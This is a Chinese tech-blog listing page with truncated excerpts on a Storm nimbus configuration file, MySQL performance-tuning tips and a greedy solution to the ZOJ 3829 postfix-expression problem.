    nimbus结点配置(storm.yaml)信息: # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional inf
  • 101个MySQL 的调节和优化的提示 tomcat_oracle mysql
     1. 拥有足够的物理内存来把整个InnoDB文件加载到内存中——在内存中访问文件时的速度要比在硬盘中访问时快的多。   2. 不惜一切代价避免使用Swap交换分区 – 交换时是从硬盘读取的,它的速度很慢。   3. 使用电池供电的RAM(注:RAM即随机存储器)。   4. 使用高级的RAID(注:Redundant Arrays of Inexpensive Disks,即磁盘阵列
  • zoj 3829 Known Notation(贪心) 阿尔萨斯 ZOJ
    题目链接:zoj 3829 Known Notation 题目大意:给定一个不完整的后缀表达式,要求有2种不同操作,用尽量少的操作使得表达式完整。 解题思路:贪心,数字的个数要要保证比∗的个数多1,不够的话优先补在开头是最优的。然后遍历一遍字符串,碰到数字+1,碰到∗-1,保证数字的个数大于等1,如果不够减的话,可以和最后面的一个数字交换位置(用栈维护十分方便),因为添加和交换代价都是1
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他